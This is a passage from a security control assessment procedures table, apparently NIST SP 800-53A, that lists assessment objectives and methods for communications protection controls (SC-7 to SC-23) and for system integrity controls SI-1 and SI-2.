| Examine: [SELECT FROM: System and communications protection policy; procedures addressing prioritization of information system resources; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms implementing resource allocation capability]. |
| ASSESSMENT PROCEDURE | |
| SC-7 | BOUNDARY PROTECTION |
| Control: The information system monitors and controls communications at the external boundary of the information system and at key internal boundaries within the system. | |
| Supplemental Guidance: Any connections to the Internet, or other external networks or information systems, occur through managed interfaces consisting of appropriate boundary protection devices (e.g., proxies, gateways, routers, firewalls, guards, encrypted tunnels) arranged in an effective architecture (e.g., routers protecting firewalls and application gateways residing on a protected subnetwork commonly referred to as a demilitarized zone or DMZ). Information system boundary protections at any designated alternate processing sites provide the same levels of protection as that of the primary site.
As part of a defense-in-depth protection strategy, the organization considers partitioning higher-impact information systems into separate physical domains (or environments) and applying the concepts of managed interfaces described above to restrict or prohibit network access in accordance with an organizational assessment of risk. FIPS 199 security categorization guides the selection of appropriate candidates for domain partitioning. The organization carefully considers the intrinsically shared nature of commercial telecommunications services in the implementation of security controls associated with the use of such services. Commercial telecommunications services are commonly based on network components and consolidated management systems shared by all attached commercial customers, and may include third party provided access lines and other service elements. Consequently, such interconnecting transmission services may represent sources of increased risk despite contract security provisions. Therefore, when this situation occurs, the organization either implements appropriate compensating security controls or explicitly accepts the additional risk. NIST Special Publication 800- 77 provides guidance on virtual private networks. Related security controls: MP-4, RA-2. | |
| SC-7.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines key internal boundaries of the information system; and | |
| (ii) the information system monitors and controls communications at the external boundary of the information system and at key internal boundaries within the system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; list of key internal boundaries of the information system; information system design documentation; boundary protection hardware and software; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Selected organizational personnel with boundary protection responsibilities]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing boundary protection capability within the information system]. (H) | |
| SC-7(1) | BOUNDARY PROTECTION |
| Control Enhancement: | |
| The organization physically allocates publicly accessible information system components to separate subnetworks with separate, physical network interfaces. | |
| Enhancement Supplemental Guidance: Publicly accessible information system components include, for example, public web servers. | |
| SC-7(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization physically allocates publicly accessible information system components to separate subnetworks with separate, physical network interfaces. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; information system design documentation; information system hardware and software; information system architecture; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| SC-7(2) | BOUNDARY PROTECTION |
| Control Enhancement: | |
| The organization prevents public access into the organization's internal networks except as appropriately mediated. | |
| SC-7(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines the mediation necessary for public access to the organization's internal networks; and | |
| (ii) the organization prevents public access into the organization's internal networks except as appropriately mediated. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; list of mediation vehicles for allowing public access to the organization's internal networks; information system design documentation; boundary protection hardware and software; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing access controls for public access to the organization's internal networks]. (H) | |
| SC-7(3) | BOUNDARY PROTECTION |
| Control Enhancement: | |
| The organization limits the number of access points to the information system to allow for better monitoring of inbound and outbound network traffic. | |
| SC-7(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization limits the number of access points to the information system to allow for better monitoring of inbound and outbound network traffic. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; information system design documentation; boundary protection hardware and software; information system architecture and configuration documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| SC-7(4) | BOUNDARY PROTECTION |
| Control Enhancement: | |
| The organization implements a managed interface (boundary protection devices in an effective security architecture) with any external telecommunication service, implementing controls appropriate to the required protection of the confidentiality and integrity of the information being transmitted. | |
| SC-7(4).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization implements a managed interface (boundary protection devices in an effective security architecture) with any external telecommunication service, implementing controls appropriate to the required protection of the confidentiality and integrity of the information being transmitted. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; information system security architecture; information system design documentation; boundary protection hardware and software; information system architecture and configuration documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Selected organizational personnel with boundary protection responsibilities]. (H) | |
| SC-7(5) | BOUNDARY PROTECTION |
| Control Enhancement: | |
| The information system denies network traffic by default and allows network traffic by exception (i.e., deny all, permit by exception). | |
| SC-7(5).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system denies network traffic by default and allows network traffic by exception. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Selected organizational personnel with boundary protection responsibilities]. (H) | |
| SC-7(6) | BOUNDARY PROTECTION |
| Control Enhancement: | |
| The organization prevents the unauthorized release of information outside of the information system boundary or any unauthorized communication through the information system boundary when there is an operational failure of the boundary protection mechanisms. | |
| SC-7(6).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization prevents the unauthorized release of information outside of the information system boundary or any unauthorized communication through the information system boundary when there is an operational failure of the boundary protection mechanisms. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms supporting the fail-safe boundary protection capability within the information system]. (H) |
| ASSESSMENT PROCEDURE | |
| SC-8 | TRANSMISSION INTEGRITY |
| Control: The information system protects the integrity of transmitted information. | |
| Supplemental Guidance: If the organization is relying on a commercial service provider for transmission services as a commodity item rather than a fully dedicated service, it may be more difficult to obtain the necessary assurances regarding the implementation of needed security controls for transmission integrity. When it is infeasible or impractical to obtain the necessary security controls and assurances of control effectiveness through appropriate contracting vehicles, the organization either implements appropriate compensating security controls or explicitly accepts the additional risk. NIST Special Publication 800-52 provides guidance on protecting transmission integrity using Transport Layer Security (TLS). NIST Special Publication 800-77 provides guidance on protecting transmission integrity using IPsec. NIST Special Publication 800-81 provides guidance on Domain Name System (DNS) message authentication and integrity verification. NSTISSI No. 7003 contains guidance on the use of Protective Distribution Systems. | |
| SC-8.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system protects the integrity of transmitted information. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing transmission integrity; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Transmission integrity capability within the information system]. (H) | |
| SC-8(1) | TRANSMISSION INTEGRITY |
| Control Enhancement: | |
| The organization employs cryptographic mechanisms to recognize changes to information during transmission unless otherwise protected by alternative physical measures. | |
| Enhancement Supplemental Guidance: Alternative physical protection measures include, for example, protected distribution systems. | |
| SC-8(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system employs cryptographic mechanisms to recognize changes to information during transmission unless otherwise protected by alternative physical measures | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing transmission integrity; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Cryptographic mechanisms implementing transmission integrity capability within the information system]. (H) |
| ASSESSMENT PROCEDURE | |
| SC-9 | TRANSMISSION CONFIDENTIALITY |
| Control: The information system protects the confidentiality of transmitted information. | |
| Supplemental Guidance: If the organization is relying on a commercial service provider for transmission services as a commodity item rather than a fully dedicated service, it may be more difficult to obtain the necessary assurances regarding the implementation of needed security controls for transmission confidentiality. When it is infeasible or impractical to obtain the necessary security controls and assurances of control effectiveness through appropriate contracting vehicles, the organization either implements appropriate compensating security controls or explicitly accepts the additional risk. NIST Special Publication 800-52 provides guidance on protecting transmission confidentiality using Transport Layer Security (TLS). NIST Special Publication 800-77 provides guidance on protecting transmission confidentiality using IPsec. NSTISSI No. 7003 contains guidance on the use of Protective Distribution Systems. Related security control: AC-17. | |
| SC-9.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system protects the confidentiality of transmitted information. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing transmission confidentiality; information system design documentation; contracts for telecommunications services; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Transmission confidentiality capability within the information system]. (H) | |
| SC-9(1) | TRANSMISSION CONFIDENTIALITY |
| Control Enhancement: | |
| The organization employs cryptographic mechanisms to prevent unauthorized disclosure of information during transmission unless otherwise protected by alternative physical measures. | |
| Enhancement Supplemental Guidance: Alternative physical protection measures include, for example, protected distribution systems. | |
| SC-9(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system employs cryptographic mechanisms to prevent unauthorized disclosure of information during transmission unless otherwise protected by alternative physical measure. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing transmission confidentiality; information system design documentation; information system communications hardware and software or Protected Distribution System protection mechanisms; information system configuration settings and associated documentation; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Cryptographic mechanisms implementing transmission confidentiality capability within the information system]. (H) |
| ASSESSMENT PROCEDURE | |
| SC-10 | NETWORK DISCONNECT |
| Control: The information system terminates a network connection at the end of a session or after [Assignment: organization-defined time period] of inactivity. | |
| Supplemental Guidance: The organization applies this control within the context of risk management that considers specific mission or operational requirements. | |
| SC-10.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the time period of inactivity before the information system terminates a network connection; and | |
| (ii) the information system terminates a network connection at the end of a session or after the organization-defined time period of inactivity. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing network disconnect; information system design documentation; organization-defined time period of inactivity before network disconnect; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Network disconnect capability within the information system]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| SC-11 | TRUSTED PATH |
| Control: The information system establishes a trusted communications path between the user and the following security functions of the system: [Assignment: organization- defined security functions to include at a minimum, information system authentication and reauthentication]. | |
| Supplemental Guidance: A trusted path is employed for high-confidence connections between the security functions of the information system and the user (e.g., for login). | |
| SC-11.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the security functions within the information system that are included in a trusted communications path; | |
| (ii) the organization-defined security functions include information system authentication and reauthentication; and | |
| (iii) the information system establishes a trusted communications path between the user and the organization-defined security functions within the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing trusted communications paths; security plan; information system design documentation; information system configuration settings and associated documentation; assessment results from independent, testing organizations; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms implementing trusted communications paths within the information system]. |
| ASSESSMENT PROCEDURE | |
| SC-12 | CRYPTOGRAPHIC KEY ESTABLISHMENT AND MANAGEMENT |
| Control: When cryptography is required and employed within the information system, the organization establishes and manages cryptographic keys using automated mechanisms with supporting procedures or manual procedures. | |
| Supplemental Guidance: NIST Special Publication 800-56 provides guidance on cryptographic key establishment. NIST Special Publication 800-57 provides guidance on cryptographic key management. | |
| SC-12.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization establishes and manages cryptographic keys using automated mechanisms with supporting procedures or manual procedures, when cryptography is required and employed within the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing cryptographic key management and establishment; NIST Special Publications 800-56 and 800-57; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for cryptographic key establishment or management]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing cryptographic key management and establishment within the information system]. (H) |
| ASSESSMENT PROCEDURE | |
| SC-13 | USE OF CRYPTOGRAPHY |
| Control: For information requiring cryptographic protection, the information system implements cryptographic mechanisms that comply with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. | |
| Supplemental Guidance: The applicable federal standard for employing cryptography in nonnational security information systems is FIPS 140-2 (as amended). Validation certificates issued by the NIST Cryptographic Module Validation Program (including FIPS 140-1, FIPS 140-2, and future amendments) remain in effect and the modules remain available for continued use and purchase until a validation certificate is specifically revoked. NIST Special Publications 800-56 and 800-57 provide guidance on cryptographic key establishment and cryptographic key management. Additional information on the use of validated cryptography is available at http://csrc.nist.gov/cryptval. | |
| SC-13.1 | ASSESSMENT OBJECTIVE: |
| Determine if, for information requiring cryptographic protection, the information system implements cryptographic mechanisms that comply with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing use of cryptography; FIPS 140-2 (as amended); NIST Special Publications 800-56 and 800-57; information system design documentation; information system configuration settings and associated documentation; cryptographic module validation certificates; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| SC-14 | PUBLIC ACCESS PROTECTIONS |
| Control: The information system protects the integrity and availability of publicly available information and applications. | |
| Supplemental Guidance: None. | |
| SC-14.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system protects the integrity and availability of publicly available information and applications. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing public access protections; access control policy and procedures; boundary protection procedures; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms protecting the integrity and availability of publicly available information and applications within the information system]. (H) |
| ASSESSMENT PROCEDURE | |
| SC-15 | COLLABORATIVE COMPUTING |
| Control: The information system prohibits remote activation of collaborative computing mechanisms and provides an explicit indication of use to the local users. | |
| Supplemental Guidance: Collaborative computing mechanisms include, for example, video and audio conferencing capabilities. Explicit indication of use includes, for example, signals to local users when cameras and/or microphones are activated. | |
| SC-15.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system prohibits remote activation of collaborative computing mechanisms and provides an explicit indication of use to the local users. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing collaborative computing; access control policy and procedures; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing access controls for collaborative computing environments; alert notification for local users]. (H) | |
| SC-15(1) | COLLABORATIVE COMPUTING |
| Control Enhancement: | |
| The information system provides physical disconnect of camera and microphone in a manner that supports ease of use. | |
| SC-15(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system provides physical disconnect of camera and microphone in a manner that supports ease of use. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing collaborative computing; access control policy and procedures; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. | |
| Test: [SELECT FROM: Physical disconnect of collaborative computing devices]. |
| ASSESSMENT PROCEDURE | |
| SC-16 | TRANSMISSION OF SECURITY PARAMETERS |
| Control: The information system reliably associates security parameters with information exchanged between information systems. | |
| Supplemental Guidance: Security parameters include, for example, security labels and markings. Security parameters may be explicitly or implicitly associated with the information contained within the information system. | |
| SC-16.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system reliably associates security parameters with information exchanged between information systems. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing transmission of security parameters; access control policy and procedures; boundary protection procedures; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms supporting reliable transmission of security parameters between information systems]. |
| ASSESSMENT PROCEDURE | |
| SC-17 | PUBLIC KEY INFRASTRUCTURE CERTIFICATES |
| Control: The organization issues public key certificates under an appropriate certificate policy or obtains public key certificates under an appropriate certificate policy from an approved service provider. | |
| Supplemental Guidance: For user certificates, each agency either establishes an agency certification authority cross-certified with the Federal Bridge Certification Authority at medium assurance or higher or uses certificates from an approved, shared service provider, as required by OMB Memorandum 05-24. NIST Special Publication 800-32 provides guidance on public key technology. NIST Special Publication 800-63 provides guidance on remote electronic authentication. | |
| SC-17.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization issues public key certificates under an appropriate certificate policy or obtains public key certificates under an appropriate certificate policy from an approved service provider. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing public key infrastructure certificates; public key certificate policy or policies; public key issuing process; NIST Special Publication 800-32; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with public key infrastructure certificate issuing responsibilities]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| SC-18 | MOBILE CODE |
| Control: The organization: (i) establishes usage restrictions and implementation guidance for mobile code technologies based on the potential to cause damage to the information system if used maliciously; and (ii) authorizes, monitors, and controls the use of mobile code within the information system. | |
| Supplemental Guidance: Mobile code technologies include, for example, Java, JavaScript, ActiveX, PDF, Postscript, Shockwave movies, Flash animations, and VBScript. Usage restrictions and implementation guidance apply to both the selection and use of mobile code installed on organizational servers and mobile code downloaded and executed on individual workstations. Control procedures prevent the development, acquisition, or introduction of unacceptable mobile code within the information system. NIST Special Publication 800-28 provides guidance on active content and mobile code. | |
| SC-18.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization establishes usage restrictions and implementation guidance for mobile code technologies based on the potential to cause damage to the information system if used maliciously; and | |
| (ii) the organization authorizes, monitors, and controls the use of mobile code within the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing mobile code; mobile code usage restrictions, mobile code implementation guidance; NIST Special Publication 800-28; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with mobile code authorization, monitoring, and control responsibilities]. (M) (H) | |
| Test: [SELECT FROM: Mobile code authorization and monitoring capability for the organization]. (H) |
| ASSESSMENT PROCEDURE | |
| SC-19 | VOICE OVER INTERNET PROTOCOL |
| Control: The organization: (i) establishes usage restrictions and implementation guidance for Voice over Internet Protocol (VoIP) technologies based on the potential to cause damage to the information system if used maliciously; and (ii) authorizes, monitors, and controls the use of VoIP within the information system. | |
| Supplemental Guidance: NIST Special Publication 800-58 provides guidance on security considerations for VoIP technologies employed in information systems. | |
| SC-19.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization establishes usage restrictions and implementation guidance for Voice over Internet Protocol technologies based on the potential to cause damage to the information system if used maliciously; and | |
| (ii) the organization authorizes, monitors, and controls the use of VoIP within the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing VoIP; NIST Special Publication 800-58; VoIP usage restrictions; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with VoIP authorization and monitoring responsibilities]. (M) (H) | |
| Test: [SELECT FROM: VoIP authorization and monitoring capability for the organization]. (H) |
| ASSESSMENT PROCEDURE | |
| SC-20 | SECURE NAME / ADDRESS RESOLUTION SERVICE (AUTHORITATIVE SOURCE) |
| Control: The information system that provides name/address resolution service provides additional data origin and integrity artifacts along with the authoritative data it returns in response to resolution queries. | |
| Supplemental Guidance: This control enables remote clients to obtain origin authentication and integrity verification assurances for the name/address resolution information obtained through the service. A domain name system (DNS) server is an example of an information system that provides name/address resolution service; digital signatures and cryptographic keys are examples of additional artifacts; and DNS resource records are examples of authoritative data. NIST Special Publication 800-81 provides guidance on secure domain name system deployment. | |
| SC-20.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system, (if the system provides a name/address resolution service), provides artifacts for additional data origin authentication and data integrity artifacts along with the authoritative data it returns in response to resolution queries. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing secure name/address resolution service (authoritative source); NIST Special Publication 800-81; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing secure name/address resolution service (authoritative source)]. (H) | |
| SC-20(1) | SECURE NAME / ADDRESS RESOLUTION SERVICE (AUTHORITATIVE SOURCE) |
| Control Enhancement: | |
| The information system, when operating as part of a distributed, hierarchical namespace, provides the means to indicate the security status of child subspaces and (if the child supports secure resolution services) enable verification of a chain of trust among parent and child domains. | |
| Enhancement Supplemental Guidance: An example means to indicate the security status of child subspaces is through the use of delegation signer resource records. | |
| SC-20(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system, when operating as part of a distributed, hierarchical namespace, provides the means to indicate the security status of child subspaces and (if the child supports secure resolution services) enable verification of a chain of trust among parent and child domains. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing secure name/address resolution service (authoritative source); information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms implementing child subspace security status indicators and chain of trust verification for resolution services]. |
| ASSESSMENT PROCEDURE | |
| SC-21 | SECURE NAME / ADDRESS RESOLUTION SERVICE (RECURSIVE OR CACHING RESOLVER) |
| Control: The information system that provides name/address resolution service for local clients performs data origin authentication and data integrity verification on the resolution responses it receives from authoritative sources when requested by client systems. | |
| Supplemental Guidance: A resolving or caching domain name system (DNS) server is an example of an information system that provides name/address resolution service for local clients and authoritative DNS servers are examples of authoritative sources. NIST Special Publication 800-81 provides guidance on secure domain name system deployment. | |
| SC-21.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system that provides name/address resolution service for local clients performs data origin authentication and data integrity verification on the resolution responses it receives from authoritative sources when requested by client systems. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing secure name/address resolution service (recursive or caching resolver); information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing data origin authentication and integrity verification for resolution services]. (H) | |
| SC-21(1) | SECURE NAME / ADDRESS RESOLUTION SERVICE (RECURSIVE OR CACHING RESOLVER) |
| Control Enhancement: | |
| The information system performs data origin authentication and data integrity verification on all resolution responses whether or not local clients explicitly request this service. | |
| Enhancement Supplemental Guidance: Local clients include, for example, DNS stub resolvers. | |
| SC-21(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system performs data origin authentication and data integrity verification on all resolution responses received whether or not client systems explicitly request this service. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing secure name/address resolution service (recursive or caching resolver); NIST Special Publication 800-81; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms implementing data origin authentication and integrity verification for resolution services]. |
| ASSESSMENT PROCEDURE | |
| SC-22 | ARCHITECTURE AND PROVISIONING FOR NAME / ADDRESS RESOLUTION SERVICE |
| Control: The information systems that collectively provide name/address resolution service for an organization are fault tolerant and implement role separation. | |
| Supplemental Guidance: A domain name system (DNS) server is an example of an information system that provides name/address resolution service. To eliminate single points of failure and to enhance redundancy, there are typically at least two authoritative domain name system (DNS) servers, one configured as primary and the other as secondary. Additionally, the two servers are commonly located in two different network subnets and geographically separated (i.e., not located in the same physical facility). If organizational information technology resources are divided into those resources belonging to internal networks and those resources belonging to external networks, authoritative DNS servers with two roles (internal and external) are established. The DNS server with the internal role provides name/address resolution information pertaining to both internal and external information technology resources while the DNS server with the external role only provides name/address resolution information pertaining to external information technology resources. The list of clients who can access the authoritative DNS server of a particular role is also specified. NIST Special Publication 800-81 provides guidance on secure DNS deployment. | |
| SC-22.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information systems that collectively provide name/address resolution service for an organization are fault tolerant and implement role separation. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing architecture and provisioning for name/address resolution service; access control policy and procedures; NIST Special Publication 800-81; information system design documentation; assessment results from independent, testing organizations; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms supporting name/address resolution service for fault tolerance and role separation]. (H) |
| ASSESSMENT PROCEDURE | |
| SC-23 | SESSION AUTHENTICITY |
| Control: The information system provides mechanisms to protect the authenticity of communications sessions. | |
| Supplemental Guidance: This control focuses on communications protection at the session, versus packet, level. The intent of this control is to implement session-level protection where needed (e.g., in service-oriented architectures providing web-based services). NIST Special Publication 800-52 provides guidance on the use of transport layer security (TLS) mechanisms. NIST Special Publication 800-77 provides guidance on the deployment of IPsec virtual private networks (VPNs) and other methods of protecting communications sessions. NIST Special Publication 800-95 provides guidance on secure web services. | |
| SC-23.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system provides mechanisms to protect the authenticity of communications sessions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and communications protection policy; procedures addressing session authenticity; NIST Special Publications 800-52, 800-77, and 800-95; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing session authenticity]. (H) |
FAMILY:
System and Services Acquisition
| ASSESSMENT PROCEDURE | |
| SI-1 | SYSTEM AND INFORMATION INTEGRITY POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, system and information integrity policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the system and information integrity policy and associated system and information integrity controls. | |
| Supplemental Guidance: The system and information integrity policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The system and information integrity policy can be included as part of the general information security policy for the organization. System and information integrity procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| SI-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents system and information integrity policy and procedures; | |
| (ii) the organization disseminates system and information integrity policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review system and information integrity policy and procedures; and | |
| (iv) the organization updates system and information integrity policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and information integrity policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with system and information integrity responsibilities]. (H) | |
| SI-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the system and information integrity policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the system and information integrity policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the system and information integrity procedures address all areas identified in the system and information integrity policy and address achieving policy-compliant implementations of all associated system and information integrity controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and information integrity policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with system and information integrity responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| SI-2 | FLAW REMEDIATION |
| Control: The organization identifies, reports, and corrects information system flaws. | |
| Supplemental Guidance: The organization identifies information systems containing software affected by recently announced software flaws (and potential vulnerabilities resulting from those flaws). The organization (or the software developer/vendor in the case of software developed and maintained by a vendor/contractor) promptly installs newly released security relevant patches, service packs, and hot fixes, and tests patches, service packs, and hot fixes for effectiveness and potential side effects on the organization's information systems before installation. Flaws discovered during security assessments, continuous monitoring, incident response activities, or information system error handling are also addressed expeditiously. Flaw remediation is incorporated into configuration management as an emergency change. NIST Special Publication 800-40 provides guidance on security patch installation and patch management. Related security controls: CA-2, CA-4, CA-7, CM-3, IR-4, SI-11. | |
| SI-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies, reports, and corrects information system flaws; | |
| (ii) the organization installs newly released security patches, service packs, and hot fixes on the information system in a reasonable timeframe in accordance with organizational policy and procedures; | |
| (iii) the organization addresses flaws discovered during security assessments, continuous monitoring, or incident response activities in an expeditious manner in accordance with organizational policy and procedures; | |
| (iv) the organization tests information system patches, service packs, and hot fixes for effectiveness and potential side effects before installation; and | |
| (v) the organization captures all appropriate information pertaining to the discovered flaws in the information system, including the cause of the flaws, mitigation activities, and lessons learned. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: System and information integrity policy; procedures addressing flaw remediation; NIST Special Publication 800-40; list of flaws and vulnerabilities potentially affecting the information system; list of recent security flaw remediation actions performed on the information system (e.g., list of installed patches, service packs, hot fixes, and other software updates to correct information system flaws); test results from the installation of software to correct information system flaws; other relevant documents or records]. (L) (M) (H) | |
